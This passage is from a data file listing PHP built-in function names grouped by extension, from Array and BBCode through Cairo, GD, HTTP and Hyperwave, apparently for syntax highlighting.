'array_unique', 'array_unshift', 'array_values', 'array_walk_recursive', 'array_walk', 'array', 'arsort', 'asort', 'compact', 'count', 'current', 'each', 'end', 'extract', 'in_array', 'key_exists', 'key', 'krsort', 'ksort', 'list', 'natcasesort', 'natsort', 'next', 'pos', 'prev', 'range', 'reset', 'rsort', 'shuffle', 'sizeof', 'sort', 'uasort', 'uksort', 'usort'], 'BBCode': ['bbcode_add_element', 'bbcode_add_smiley', 'bbcode_create', 'bbcode_destroy', 'bbcode_parse', 'bbcode_set_arg_parser', 'bbcode_set_flags'], 'BC Math': ['bcadd', 'bccomp', 'bcdiv', 'bcmod', 'bcmul', 'bcpow', 'bcpowmod', 'bcscale', 'bcsqrt', 'bcsub'], 'Blenc': ['blenc_encrypt'], 'Bzip2': ['bzclose', 'bzcompress', 'bzdecompress', 'bzerrno', 'bzerror', 'bzerrstr', 'bzflush', 'bzopen', 'bzread', 'bzwrite'], 'COM': ['com_addref', 'com_create_guid', 'com_event_sink', 'com_get_active_object', 'com_get', 'com_invoke', 'com_isenum', 'com_load_typelib', 'com_load', 'com_message_pump', 'com_print_typeinfo', 'com_propget', 'com_propput', 'com_propset', 'com_release', 'com_set', 'variant_abs', 'variant_add', 'variant_and', 'variant_cast', 'variant_cat', 'variant_cmp', 'variant_date_from_timestamp', 'variant_date_to_timestamp', 'variant_div', 'variant_eqv', 'variant_fix', 'variant_get_type', 'variant_idiv', 'variant_imp', 'variant_int', 'variant_mod', 'variant_mul', 'variant_neg', 'variant_not', 'variant_or', 'variant_pow', 'variant_round', 'variant_set_type', 'variant_set', 'variant_sub', 'variant_xor'], 'CUBRID': ['cubrid_bind', 'cubrid_close_prepare', 'cubrid_close_request', 'cubrid_col_get', 'cubrid_col_size', 'cubrid_column_names', 'cubrid_column_types', 'cubrid_commit', 'cubrid_connect_with_url', 'cubrid_connect', 'cubrid_current_oid', 'cubrid_disconnect', 'cubrid_drop', 'cubrid_error_code_facility', 'cubrid_error_code', 'cubrid_error_msg', 'cubrid_execute', 'cubrid_fetch', 'cubrid_free_result', 'cubrid_get_autocommit', 'cubrid_get_charset', 'cubrid_get_class_name', 'cubrid_get_client_info', 'cubrid_get_db_parameter', 'cubrid_get_query_timeout', 'cubrid_get_server_info', 'cubrid_get', 'cubrid_insert_id', 'cubrid_is_instance', 'cubrid_lob_close', 'cubrid_lob_export', 'cubrid_lob_get', 'cubrid_lob_send', 'cubrid_lob_size', 'cubrid_lob2_bind', 'cubrid_lob2_close', 'cubrid_lob2_export', 'cubrid_lob2_import', 'cubrid_lob2_new', 'cubrid_lob2_read', 'cubrid_lob2_seek64', 'cubrid_lob2_seek', 'cubrid_lob2_size64', 'cubrid_lob2_size', 'cubrid_lob2_tell64', 'cubrid_lob2_tell', 'cubrid_lob2_write', 'cubrid_lock_read', 'cubrid_lock_write', 'cubrid_move_cursor', 'cubrid_next_result', 'cubrid_num_cols', 'cubrid_num_rows', 'cubrid_pconnect_with_url', 'cubrid_pconnect', 'cubrid_prepare', 'cubrid_put', 'cubrid_rollback', 'cubrid_schema', 'cubrid_seq_drop', 'cubrid_seq_insert', 'cubrid_seq_put', 'cubrid_set_add', 'cubrid_set_autocommit', 'cubrid_set_db_parameter', 'cubrid_set_drop', 'cubrid_set_query_timeout', 'cubrid_version'], 'Cairo': ['cairo_create', 'cairo_font_face_get_type', 'cairo_font_face_status', 'cairo_font_options_create', 'cairo_font_options_equal', 'cairo_font_options_get_antialias', 'cairo_font_options_get_hint_metrics', 'cairo_font_options_get_hint_style', 'cairo_font_options_get_subpixel_order', 'cairo_font_options_hash', 'cairo_font_options_merge', 'cairo_font_options_set_antialias', 'cairo_font_options_set_hint_metrics', 'cairo_font_options_set_hint_style', 'cairo_font_options_set_subpixel_order', 'cairo_font_options_status', 'cairo_format_stride_for_width', 'cairo_image_surface_create_for_data', 'cairo_image_surface_create_from_png', 'cairo_image_surface_create', 'cairo_image_surface_get_data', 'cairo_image_surface_get_format', 'cairo_image_surface_get_height', 'cairo_image_surface_get_stride', 'cairo_image_surface_get_width', 'cairo_matrix_create_scale', 'cairo_matrix_create_translate', 'cairo_matrix_invert', 'cairo_matrix_multiply', 'cairo_matrix_rotate', 'cairo_matrix_transform_distance', 'cairo_matrix_transform_point', 'cairo_matrix_translate', 'cairo_pattern_add_color_stop_rgb', 'cairo_pattern_add_color_stop_rgba', 'cairo_pattern_create_for_surface', 'cairo_pattern_create_linear', 'cairo_pattern_create_radial', 'cairo_pattern_create_rgb', 'cairo_pattern_create_rgba', 'cairo_pattern_get_color_stop_count', 'cairo_pattern_get_color_stop_rgba', 'cairo_pattern_get_extend', 'cairo_pattern_get_filter', 'cairo_pattern_get_linear_points', 'cairo_pattern_get_matrix', 'cairo_pattern_get_radial_circles', 'cairo_pattern_get_rgba', 'cairo_pattern_get_surface', 'cairo_pattern_get_type', 'cairo_pattern_set_extend', 'cairo_pattern_set_filter', 'cairo_pattern_set_matrix', 'cairo_pattern_status', 'cairo_pdf_surface_create', 'cairo_pdf_surface_set_size', 'cairo_ps_get_levels', 'cairo_ps_level_to_string', 'cairo_ps_surface_create', 'cairo_ps_surface_dsc_begin_page_setup', 'cairo_ps_surface_dsc_begin_setup', 'cairo_ps_surface_dsc_comment', 'cairo_ps_surface_get_eps', 'cairo_ps_surface_restrict_to_level', 'cairo_ps_surface_set_eps', 'cairo_ps_surface_set_size', 'cairo_scaled_font_create', 'cairo_scaled_font_extents', 'cairo_scaled_font_get_ctm', 'cairo_scaled_font_get_font_face', 'cairo_scaled_font_get_font_matrix', 'cairo_scaled_font_get_font_options', 'cairo_scaled_font_get_scale_matrix', 'cairo_scaled_font_get_type', 'cairo_scaled_font_glyph_extents', 'cairo_scaled_font_status', 'cairo_scaled_font_text_extents', 'cairo_surface_copy_page', 'cairo_surface_create_similar', 'cairo_surface_finish', 'cairo_surface_flush', 'cairo_surface_get_content', 'cairo_surface_get_device_offset', 'cairo_surface_get_font_options', 'cairo_surface_get_type', 'cairo_surface_mark_dirty_rectangle', 'cairo_surface_mark_dirty', 'cairo_surface_set_device_offset', 'cairo_surface_set_fallback_resolution', 'cairo_surface_show_page', 'cairo_surface_status', 'cairo_surface_write_to_png', 'cairo_svg_surface_create', 'cairo_svg_surface_restrict_to_version', 'cairo_svg_version_to_string'], 'Calendar': ['cal_days_in_month', 'cal_from_jd', 'cal_info', 'cal_to_jd', 'easter_date', 'easter_days', 'FrenchToJD', 'GregorianToJD', 'JDDayOfWeek', 'JDMonthName', 'JDToFrench', 'JDToGregorian', 'jdtojewish', 'JDToJulian', 'jdtounix', 'JewishToJD', 'JulianToJD', 'unixtojd'], 'Classes/Object': ['__autoload', 'call_user_method_array', 'call_user_method', 'class_alias', 'class_exists', 'get_called_class', 'get_class_methods', 'get_class_vars', 'get_class', 'get_declared_classes', 'get_declared_interfaces', 'get_declared_traits', 'get_object_vars', 'get_parent_class', 'interface_exists', 'is_a', 'is_subclass_of', 'method_exists', 'property_exists', 'trait_exists'], 'Classkit': ['classkit_import', 'classkit_method_add', 'classkit_method_copy', 'classkit_method_redefine', 'classkit_method_remove', 'classkit_method_rename'], 'Crack': ['crack_check', 'crack_closedict', 'crack_getlastmessage', 'crack_opendict'], 'Ctype': ['ctype_alnum', 'ctype_alpha', 'ctype_cntrl', 'ctype_digit', 'ctype_graph', 'ctype_lower', 'ctype_print', 'ctype_punct', 'ctype_space', 'ctype_upper', 'ctype_xdigit'], 'Cyrus': ['cyrus_authenticate', 'cyrus_bind', 'cyrus_close', 'cyrus_connect', 'cyrus_query', 'cyrus_unbind'], 'DB++': ['dbplus_add', 'dbplus_aql', 'dbplus_chdir', 'dbplus_close', 'dbplus_curr', 'dbplus_errcode', 'dbplus_errno', 'dbplus_find', 'dbplus_first', 'dbplus_flush', 'dbplus_freealllocks', 'dbplus_freelock', 'dbplus_freerlocks', 'dbplus_getlock', 'dbplus_getunique', 'dbplus_info', 'dbplus_last', 'dbplus_lockrel', 'dbplus_next', 'dbplus_open', 'dbplus_prev', 'dbplus_rchperm', 'dbplus_rcreate', 'dbplus_rcrtexact', 'dbplus_rcrtlike', 'dbplus_resolve', 'dbplus_restorepos', 'dbplus_rkeys', 'dbplus_ropen', 'dbplus_rquery', 'dbplus_rrename', 'dbplus_rsecindex', 'dbplus_runlink', 'dbplus_rzap', 'dbplus_savepos', 'dbplus_setindex', 'dbplus_setindexbynumber', 'dbplus_sql', 'dbplus_tcl', 'dbplus_tremove', 'dbplus_undo', 'dbplus_undoprepare', 'dbplus_unlockrel', 'dbplus_unselect', 'dbplus_update', 'dbplus_xlockrel', 'dbplus_xunlockrel'], 'DBA': ['dba_close', 'dba_delete', 'dba_exists', 'dba_fetch', 'dba_firstkey', 'dba_handlers', 'dba_insert', 'dba_key_split', 'dba_list', 'dba_nextkey', 'dba_open', 'dba_optimize', 'dba_popen', 'dba_replace', 'dba_sync'], 'DOM': ['dom_import_simplexml'], 'Date/Time': ['checkdate', 'date_add', 'date_create_from_format', 'date_create_immutable_from_format', 'date_create_immutable', 'date_create', 'date_date_set', 'date_default_timezone_get', 'date_default_timezone_set', 'date_diff', 'date_format', 'date_get_last_errors', 'date_interval_create_from_date_string', 'date_interval_format', 'date_isodate_set', 'date_modify', 'date_offset_get', 'date_parse_from_format', 'date_parse', 'date_sub', 'date_sun_info', 'date_sunrise', 'date_sunset', 'date_time_set', 'date_timestamp_get', 'date_timestamp_set', 'date_timezone_get', 'date_timezone_set', 'date', 'getdate', 'gettimeofday', 'gmdate', 'gmmktime', 'gmstrftime', 'idate', 'localtime', 'microtime', 'mktime', 'strftime', 'strptime', 'strtotime', 'time', 'timezone_abbreviations_list', 'timezone_identifiers_list', 'timezone_location_get', 'timezone_name_from_abbr', 'timezone_name_get', 'timezone_offset_get', 'timezone_open', 'timezone_transitions_get', 'timezone_version_get'], 'Direct IO': ['dio_close', 'dio_fcntl', 'dio_open', 'dio_read', 'dio_seek', 'dio_stat', 'dio_tcsetattr', 'dio_truncate', 'dio_write'], 'Directory': ['chdir', 'chroot', 'closedir', 'dir', 'getcwd', 'opendir', 'readdir', 'rewinddir', 'scandir'], 'Eio': ['eio_busy', 'eio_cancel', 'eio_chmod', 'eio_chown', 'eio_close', 'eio_custom', 'eio_dup2', 'eio_event_loop', 'eio_fallocate', 'eio_fchmod', 'eio_fchown', 'eio_fdatasync', 'eio_fstat', 'eio_fstatvfs', 'eio_fsync', 'eio_ftruncate', 'eio_futime', 'eio_get_event_stream', 'eio_get_last_error', 'eio_grp_add', 'eio_grp_cancel', 'eio_grp_limit', 'eio_grp', 'eio_init', 'eio_link', 'eio_lstat', 'eio_mkdir', 'eio_mknod', 'eio_nop', 'eio_npending', 'eio_nready', 'eio_nreqs', 'eio_nthreads', 'eio_open', 'eio_poll', 'eio_read', 'eio_readahead', 'eio_readdir', 'eio_readlink', 'eio_realpath', 'eio_rename', 'eio_rmdir', 'eio_seek', 'eio_sendfile', 'eio_set_max_idle', 'eio_set_max_parallel', 'eio_set_max_poll_reqs', 'eio_set_max_poll_time', 'eio_set_min_parallel', 'eio_stat', 'eio_statvfs', 'eio_symlink', 'eio_sync_file_range', 'eio_sync', 'eio_syncfs', 'eio_truncate', 'eio_unlink', 'eio_utime', 'eio_write'], 'Enchant': ['enchant_broker_describe', 'enchant_broker_dict_exists', 'enchant_broker_free_dict', 'enchant_broker_free', 'enchant_broker_get_error', 'enchant_broker_init', 'enchant_broker_list_dicts', 'enchant_broker_request_dict', 'enchant_broker_request_pwl_dict', 'enchant_broker_set_ordering', 'enchant_dict_add_to_personal', 'enchant_dict_add_to_session', 'enchant_dict_check', 'enchant_dict_describe', 'enchant_dict_get_error', 'enchant_dict_is_in_session', 'enchant_dict_quick_check', 'enchant_dict_store_replacement', 'enchant_dict_suggest'], 'Error Handling': ['debug_backtrace', 'debug_print_backtrace', 'error_get_last', 'error_log', 'error_reporting', 'restore_error_handler', 'restore_exception_handler', 'set_error_handler', 'set_exception_handler', 'trigger_error', 'user_error'], 'Exif': ['exif_imagetype', 'exif_read_data', 'exif_tagname', 'exif_thumbnail', 'read_exif_data'], 'Expect': ['expect_expectl', 'expect_popen'], 'FAM': ['fam_cancel_monitor', 'fam_close', 'fam_monitor_collection', 'fam_monitor_directory', 'fam_monitor_file', 'fam_next_event', 'fam_open', 'fam_pending', 'fam_resume_monitor', 'fam_suspend_monitor'], 'FDF': ['fdf_add_doc_javascript', 'fdf_add_template', 'fdf_close', 'fdf_create', 'fdf_enum_values', 'fdf_errno', 'fdf_error', 'fdf_get_ap', 'fdf_get_attachment', 'fdf_get_encoding', 'fdf_get_file', 'fdf_get_flags', 'fdf_get_opt', 'fdf_get_status', 'fdf_get_value', 'fdf_get_version', 'fdf_header', 'fdf_next_field_name', 'fdf_open_string', 'fdf_open', 'fdf_remove_item', 'fdf_save_string', 'fdf_save', 'fdf_set_ap', 'fdf_set_encoding', 'fdf_set_file', 'fdf_set_flags', 'fdf_set_javascript_action', 'fdf_set_on_import_javascript', 'fdf_set_opt', 'fdf_set_status', 'fdf_set_submit_form_action', 'fdf_set_target_frame', 'fdf_set_value', 'fdf_set_version'], 'FPM': ['fastcgi_finish_request'], 'FTP': ['ftp_alloc', 'ftp_cdup', 'ftp_chdir', 'ftp_chmod', 'ftp_close', 'ftp_connect', 'ftp_delete', 'ftp_exec', 'ftp_fget', 'ftp_fput', 'ftp_get_option', 'ftp_get', 'ftp_login', 'ftp_mdtm', 'ftp_mkdir', 'ftp_nb_continue', 'ftp_nb_fget', 'ftp_nb_fput', 'ftp_nb_get', 'ftp_nb_put', 'ftp_nlist', 'ftp_pasv', 'ftp_put', 'ftp_pwd', 'ftp_quit', 'ftp_raw', 'ftp_rawlist', 'ftp_rename', 'ftp_rmdir', 'ftp_set_option', 'ftp_site', 'ftp_size', 'ftp_ssl_connect', 'ftp_systype'], 'Fann': ['fann_cascadetrain_on_data', 'fann_cascadetrain_on_file', 'fann_clear_scaling_params', 'fann_copy', 'fann_create_from_file', 'fann_create_shortcut_array', 'fann_create_shortcut', 'fann_create_sparse_array', 'fann_create_sparse', 'fann_create_standard_array', 'fann_create_standard', 'fann_create_train_from_callback', 'fann_create_train', 'fann_descale_input', 'fann_descale_output', 'fann_descale_train', 'fann_destroy_train', 'fann_destroy', 'fann_duplicate_train_data', 'fann_get_activation_function', 'fann_get_activation_steepness', 'fann_get_bias_array', 'fann_get_bit_fail_limit', 'fann_get_bit_fail', 'fann_get_cascade_activation_functions_count', 'fann_get_cascade_activation_functions', 'fann_get_cascade_activation_steepnesses_count', 'fann_get_cascade_activation_steepnesses', 'fann_get_cascade_candidate_change_fraction', 'fann_get_cascade_candidate_limit', 'fann_get_cascade_candidate_stagnation_epochs', 'fann_get_cascade_max_cand_epochs', 'fann_get_cascade_max_out_epochs', 'fann_get_cascade_min_cand_epochs', 'fann_get_cascade_min_out_epochs', 'fann_get_cascade_num_candidate_groups', 'fann_get_cascade_num_candidates', 'fann_get_cascade_output_change_fraction', 'fann_get_cascade_output_stagnation_epochs', 'fann_get_cascade_weight_multiplier', 'fann_get_connection_array', 'fann_get_connection_rate', 'fann_get_errno', 'fann_get_errstr', 'fann_get_layer_array', 'fann_get_learning_momentum', 'fann_get_learning_rate', 'fann_get_MSE', 'fann_get_network_type', 'fann_get_num_input', 'fann_get_num_layers', 'fann_get_num_output', 'fann_get_quickprop_decay', 'fann_get_quickprop_mu', 'fann_get_rprop_decrease_factor', 'fann_get_rprop_delta_max', 'fann_get_rprop_delta_min', 'fann_get_rprop_delta_zero', 'fann_get_rprop_increase_factor', 'fann_get_sarprop_step_error_shift', 'fann_get_sarprop_step_error_threshold_factor', 'fann_get_sarprop_temperature', 'fann_get_sarprop_weight_decay_shift', 'fann_get_total_connections', 'fann_get_total_neurons', 'fann_get_train_error_function', 'fann_get_train_stop_function', 'fann_get_training_algorithm', 'fann_init_weights', 'fann_length_train_data', 'fann_merge_train_data', 'fann_num_input_train_data', 'fann_num_output_train_data', 'fann_print_error', 'fann_randomize_weights', 'fann_read_train_from_file', 'fann_reset_errno', 'fann_reset_errstr', 'fann_reset_MSE', 'fann_run', 'fann_save_train', 'fann_save', 'fann_scale_input_train_data', 'fann_scale_input', 'fann_scale_output_train_data', 'fann_scale_output', 'fann_scale_train_data', 'fann_scale_train', 'fann_set_activation_function_hidden', 'fann_set_activation_function_layer', 'fann_set_activation_function_output', 'fann_set_activation_function', 'fann_set_activation_steepness_hidden', 'fann_set_activation_steepness_layer', 'fann_set_activation_steepness_output', 'fann_set_activation_steepness', 'fann_set_bit_fail_limit', 'fann_set_callback', 'fann_set_cascade_activation_functions', 'fann_set_cascade_activation_steepnesses', 'fann_set_cascade_candidate_change_fraction', 'fann_set_cascade_candidate_limit', 'fann_set_cascade_candidate_stagnation_epochs', 'fann_set_cascade_max_cand_epochs', 'fann_set_cascade_max_out_epochs', 'fann_set_cascade_min_cand_epochs', 'fann_set_cascade_min_out_epochs', 'fann_set_cascade_num_candidate_groups', 'fann_set_cascade_output_change_fraction', 'fann_set_cascade_output_stagnation_epochs', 'fann_set_cascade_weight_multiplier', 'fann_set_error_log', 'fann_set_input_scaling_params', 'fann_set_learning_momentum', 'fann_set_learning_rate', 'fann_set_output_scaling_params', 'fann_set_quickprop_decay', 'fann_set_quickprop_mu', 'fann_set_rprop_decrease_factor', 'fann_set_rprop_delta_max', 'fann_set_rprop_delta_min', 'fann_set_rprop_delta_zero', 'fann_set_rprop_increase_factor', 'fann_set_sarprop_step_error_shift', 'fann_set_sarprop_step_error_threshold_factor', 'fann_set_sarprop_temperature', 'fann_set_sarprop_weight_decay_shift', 'fann_set_scaling_params', 'fann_set_train_error_function', 'fann_set_train_stop_function', 'fann_set_training_algorithm', 'fann_set_weight_array', 'fann_set_weight', 'fann_shuffle_train_data', 'fann_subset_train_data', 'fann_test_data', 'fann_test', 'fann_train_epoch', 'fann_train_on_data', 'fann_train_on_file', 'fann_train'], 'Fileinfo': ['finfo_buffer', 'finfo_close', 'finfo_file', 'finfo_open', 'finfo_set_flags', 'mime_content_type'], 'Filesystem': ['basename', 'chgrp', 'chmod', 'chown', 'clearstatcache', 'copy', 'dirname', 'disk_free_space', 'disk_total_space', 'diskfreespace', 'fclose', 'feof', 'fflush', 'fgetc', 'fgetcsv', 'fgets', 'fgetss', 'file_exists', 'file_get_contents', 'file_put_contents', 'file', 'fileatime', 'filectime', 'filegroup', 'fileinode', 'filemtime', 'fileowner', 'fileperms', 'filesize', 'filetype', 'flock', 'fnmatch', 'fopen', 'fpassthru', 'fputcsv', 'fputs', 'fread', 'fscanf', 'fseek', 'fstat', 'ftell', 'ftruncate', 'fwrite', 'glob', 'is_dir', 'is_executable', 'is_file', 'is_link', 'is_readable', 'is_uploaded_file', 'is_writable', 'is_writeable', 'lchgrp', 'lchown', 'link', 'linkinfo', 'lstat', 'mkdir', 'move_uploaded_file', 'parse_ini_file', 'parse_ini_string', 'pathinfo', 'pclose', 'popen', 'readfile', 'readlink', 'realpath_cache_get', 'realpath_cache_size', 'realpath', 'rename', 'rewind', 'rmdir', 'set_file_buffer', 'stat', 'symlink', 'tempnam', 'tmpfile', 'touch', 'umask', 'unlink'], 'Filter': ['filter_has_var', 'filter_id', 'filter_input_array', 'filter_input', 'filter_list', 'filter_var_array', 'filter_var'], 'Firebird/InterBase': ['ibase_add_user', 'ibase_affected_rows', 'ibase_backup', 'ibase_blob_add', 'ibase_blob_cancel', 'ibase_blob_close', 'ibase_blob_create', 'ibase_blob_echo', 'ibase_blob_get', 'ibase_blob_import', 'ibase_blob_info', 'ibase_blob_open', 'ibase_close', 'ibase_commit_ret', 'ibase_commit', 'ibase_connect', 'ibase_db_info', 'ibase_delete_user', 'ibase_drop_db', 'ibase_errcode', 'ibase_errmsg', 'ibase_execute', 'ibase_fetch_assoc', 'ibase_fetch_object', 'ibase_fetch_row', 'ibase_field_info', 'ibase_free_event_handler', 'ibase_free_query', 'ibase_free_result', 'ibase_gen_id', 'ibase_maintain_db', 'ibase_modify_user', 'ibase_name_result', 'ibase_num_fields', 'ibase_num_params', 'ibase_param_info', 'ibase_pconnect', 'ibase_prepare', 'ibase_query', 'ibase_restore', 'ibase_rollback_ret', 'ibase_rollback', 'ibase_server_info', 'ibase_service_attach', 'ibase_service_detach', 'ibase_set_event_handler', 'ibase_trans', 'ibase_wait_event'], 'FriBiDi': ['fribidi_log2vis'], 'FrontBase': ['fbsql_affected_rows', 'fbsql_autocommit', 'fbsql_blob_size', 'fbsql_change_user', 'fbsql_clob_size', 'fbsql_close', 'fbsql_commit', 'fbsql_connect', 'fbsql_create_blob', 'fbsql_create_clob', 'fbsql_create_db', 'fbsql_data_seek', 'fbsql_database_password', 'fbsql_database', 'fbsql_db_query', 'fbsql_db_status', 'fbsql_drop_db', 'fbsql_errno', 'fbsql_error', 'fbsql_fetch_array', 'fbsql_fetch_assoc', 'fbsql_fetch_field', 'fbsql_fetch_lengths', 'fbsql_fetch_object', 'fbsql_fetch_row', 'fbsql_field_flags', 'fbsql_field_len', 'fbsql_field_name', 'fbsql_field_seek', 'fbsql_field_table', 'fbsql_field_type', 'fbsql_free_result', 'fbsql_get_autostart_info', 'fbsql_hostname', 'fbsql_insert_id', 'fbsql_list_dbs', 'fbsql_list_fields', 'fbsql_list_tables', 'fbsql_next_result', 'fbsql_num_fields', 'fbsql_num_rows', 'fbsql_password', 'fbsql_pconnect', 'fbsql_query', 'fbsql_read_blob', 'fbsql_read_clob', 'fbsql_result', 'fbsql_rollback', 'fbsql_rows_fetched', 'fbsql_select_db', 'fbsql_set_characterset', 'fbsql_set_lob_mode', 'fbsql_set_password', 'fbsql_set_transaction', 'fbsql_start_db', 'fbsql_stop_db', 'fbsql_table_name', 'fbsql_tablename', 'fbsql_username', 'fbsql_warnings'], 'Function handling': ['call_user_func_array', 'call_user_func', 'create_function', 'forward_static_call_array', 'forward_static_call', 'func_get_arg', 'func_get_args', 'func_num_args', 'function_exists', 'get_defined_functions', 'register_shutdown_function', 'register_tick_function', 'unregister_tick_function'], 'GD and Image': ['gd_info', 'getimagesize', 'getimagesizefromstring', 'image_type_to_extension', 'image_type_to_mime_type', 'image2wbmp', 'imageaffine', 'imageaffinematrixconcat', 'imageaffinematrixget', 'imagealphablending', 'imageantialias', 'imagearc', 'imagechar', 'imagecharup', 'imagecolorallocate', 'imagecolorallocatealpha', 'imagecolorat', 'imagecolorclosest', 'imagecolorclosestalpha', 'imagecolorclosesthwb', 'imagecolordeallocate', 'imagecolorexact', 'imagecolorexactalpha', 'imagecolormatch', 'imagecolorresolve', 'imagecolorresolvealpha', 'imagecolorset', 'imagecolorsforindex', 'imagecolorstotal', 'imagecolortransparent', 'imageconvolution', 'imagecopy', 'imagecopymerge', 'imagecopymergegray', 'imagecopyresampled', 'imagecopyresized', 'imagecreate', 'imagecreatefromgd2', 'imagecreatefromgd2part', 'imagecreatefromgd', 'imagecreatefromgif', 'imagecreatefromjpeg', 'imagecreatefrompng', 'imagecreatefromstring', 'imagecreatefromwbmp', 'imagecreatefromwebp', 'imagecreatefromxbm', 'imagecreatefromxpm', 'imagecreatetruecolor', 'imagecrop', 'imagecropauto', 'imagedashedline', 'imagedestroy', 'imageellipse', 'imagefill', 'imagefilledarc', 'imagefilledellipse', 'imagefilledpolygon', 'imagefilledrectangle', 'imagefilltoborder', 'imagefilter', 'imageflip', 'imagefontheight', 'imagefontwidth', 'imageftbbox', 'imagefttext', 'imagegammacorrect', 'imagegd2', 'imagegd', 'imagegif', 'imagegrabscreen', 'imagegrabwindow', 'imageinterlace', 'imageistruecolor', 'imagejpeg', 'imagelayereffect', 'imageline', 'imageloadfont', 'imagepalettecopy', 'imagepalettetotruecolor', 'imagepng', 'imagepolygon', 'imagepsbbox', 'imagepsencodefont', 'imagepsextendfont', 'imagepsfreefont', 'imagepsloadfont', 'imagepsslantfont', 'imagepstext', 'imagerectangle', 'imagerotate', 'imagesavealpha', 'imagescale', 'imagesetbrush', 'imagesetinterpolation', 'imagesetpixel', 'imagesetstyle', 'imagesetthickness', 'imagesettile', 'imagestring', 'imagestringup', 'imagesx', 'imagesy', 'imagetruecolortopalette', 'imagettfbbox', 'imagettftext', 'imagetypes', 'imagewbmp', 'imagewebp', 'imagexbm', 'iptcembed', 'iptcparse', 'jpeg2wbmp', 'png2wbmp'], 'GMP': ['gmp_abs', 'gmp_add', 'gmp_and', 'gmp_clrbit', 'gmp_cmp', 'gmp_com', 'gmp_div_q', 'gmp_div_qr', 'gmp_div_r', 'gmp_div', 'gmp_divexact', 'gmp_fact', 'gmp_gcd', 'gmp_gcdext', 'gmp_hamdist', 'gmp_init', 'gmp_intval', 'gmp_invert', 'gmp_jacobi', 'gmp_legendre', 'gmp_mod', 'gmp_mul', 'gmp_neg', 'gmp_nextprime', 'gmp_or', 'gmp_perfect_square', 'gmp_popcount', 'gmp_pow', 'gmp_powm', 'gmp_prob_prime', 'gmp_random', 'gmp_scan0', 'gmp_scan1', 'gmp_setbit', 'gmp_sign', 'gmp_sqrt', 'gmp_sqrtrem', 'gmp_strval', 'gmp_sub', 'gmp_testbit', 'gmp_xor'], 'GeoIP': ['geoip_asnum_by_name', 'geoip_continent_code_by_name', 'geoip_country_code_by_name', 'geoip_country_code3_by_name', 'geoip_country_name_by_name', 'geoip_database_info', 'geoip_db_avail', 'geoip_db_filename', 'geoip_db_get_all_info', 'geoip_domain_by_name', 'geoip_id_by_name', 'geoip_isp_by_name', 'geoip_netspeedcell_by_name', 'geoip_org_by_name', 'geoip_record_by_name', 'geoip_region_by_name', 'geoip_region_name_by_code', 'geoip_setup_custom_directory', 'geoip_time_zone_by_country_and_region'], 'Gettext': ['bind_textdomain_codeset', 'bindtextdomain', 'dcgettext', 'dcngettext', 'dgettext', 'dngettext', 'gettext', 'ngettext', 'textdomain'], 'GnuPG': ['gnupg_adddecryptkey', 'gnupg_addencryptkey', 'gnupg_addsignkey', 'gnupg_cleardecryptkeys', 'gnupg_clearencryptkeys', 'gnupg_clearsignkeys', 'gnupg_decrypt', 'gnupg_decryptverify', 'gnupg_encrypt', 'gnupg_encryptsign', 'gnupg_export', 'gnupg_geterror', 'gnupg_getprotocol', 'gnupg_import', 'gnupg_init', 'gnupg_keyinfo', 'gnupg_setarmor', 'gnupg_seterrormode', 'gnupg_setsignmode', 'gnupg_sign', 'gnupg_verify'], 'Gopher': ['gopher_parsedir'], 'Grapheme': ['grapheme_extract', 'grapheme_stripos', 'grapheme_stristr', 'grapheme_strlen', 'grapheme_strpos', 'grapheme_strripos', 'grapheme_strrpos', 'grapheme_strstr', 'grapheme_substr'], 'Gupnp': ['gupnp_context_get_host_ip', 'gupnp_context_get_port', 'gupnp_context_get_subscription_timeout', 'gupnp_context_host_path', 'gupnp_context_new', 'gupnp_context_set_subscription_timeout', 'gupnp_context_timeout_add', 'gupnp_context_unhost_path', 'gupnp_control_point_browse_start', 'gupnp_control_point_browse_stop', 'gupnp_control_point_callback_set', 'gupnp_control_point_new', 'gupnp_device_action_callback_set', 'gupnp_device_info_get_service', 'gupnp_device_info_get', 'gupnp_root_device_get_available', 'gupnp_root_device_get_relative_location', 'gupnp_root_device_new', 'gupnp_root_device_set_available', 'gupnp_root_device_start', 'gupnp_root_device_stop', 'gupnp_service_action_get', 'gupnp_service_action_return_error', 'gupnp_service_action_return', 'gupnp_service_action_set', 'gupnp_service_freeze_notify', 'gupnp_service_info_get_introspection', 'gupnp_service_info_get', 'gupnp_service_introspection_get_state_variable', 'gupnp_service_notify', 'gupnp_service_proxy_action_get', 'gupnp_service_proxy_action_set', 'gupnp_service_proxy_add_notify', 'gupnp_service_proxy_callback_set', 'gupnp_service_proxy_get_subscribed', 'gupnp_service_proxy_remove_notify', 'gupnp_service_proxy_set_subscribed', 'gupnp_service_thaw_notify'], 'HTTP': ['http_cache_etag', 'http_cache_last_modified', 'http_chunked_decode', 'http_deflate', 'http_inflate', 'http_build_cookie', 'http_date', 'http_get_request_body_stream', 'http_get_request_body', 'http_get_request_headers', 'http_match_etag', 'http_match_modified', 'http_match_request_header', 'http_support', 'http_negotiate_charset', 'http_negotiate_content_type', 'http_negotiate_language', 'ob_deflatehandler', 'ob_etaghandler', 'ob_inflatehandler', 'http_parse_cookie', 'http_parse_headers', 'http_parse_message', 'http_parse_params', 'http_persistent_handles_clean', 'http_persistent_handles_count', 'http_persistent_handles_ident', 'http_get', 'http_head', 'http_post_data', 'http_post_fields', 'http_put_data', 'http_put_file', 'http_put_stream', 'http_request_body_encode', 'http_request_method_exists', 'http_request_method_name', 'http_request_method_register', 'http_request_method_unregister', 'http_request', 'http_redirect', 'http_send_content_disposition', 'http_send_content_type', 'http_send_data', 'http_send_file', 'http_send_last_modified', 'http_send_status', 'http_send_stream', 'http_throttle', 'http_build_str', 'http_build_url'], 'Hash': ['hash_algos', 'hash_copy', 'hash_file', 'hash_final', 'hash_hmac_file', 'hash_hmac', 'hash_init', 'hash_pbkdf2', 'hash_update_file', 'hash_update_stream', 'hash_update', 'hash'], 'Hyperwave': ['hw_Array2Objrec', 'hw_changeobject', 'hw_Children', 'hw_ChildrenObj', 'hw_Close', 'hw_Connect', 'hw_connection_info', 'hw_cp', 'hw_Deleteobject', 'hw_DocByAnchor', 'hw_DocByAnchorObj', 'hw_Document_Attributes', 'hw_Document_BodyTag', 'hw_Document_Content', 'hw_Document_SetContent', 'hw_Document_Size', 'hw_dummy', 'hw_EditText', 'hw_Error', 'hw_ErrorMsg', 'hw_Free_Document', 'hw_GetAnchors', 'hw_GetAnchorsObj', 'hw_GetAndLock', 'hw_GetChildColl', 'hw_GetChildCollObj', 'hw_GetChildDocColl', 'hw_GetChildDocCollObj', 'hw_GetObject', 'hw_GetObjectByQuery', 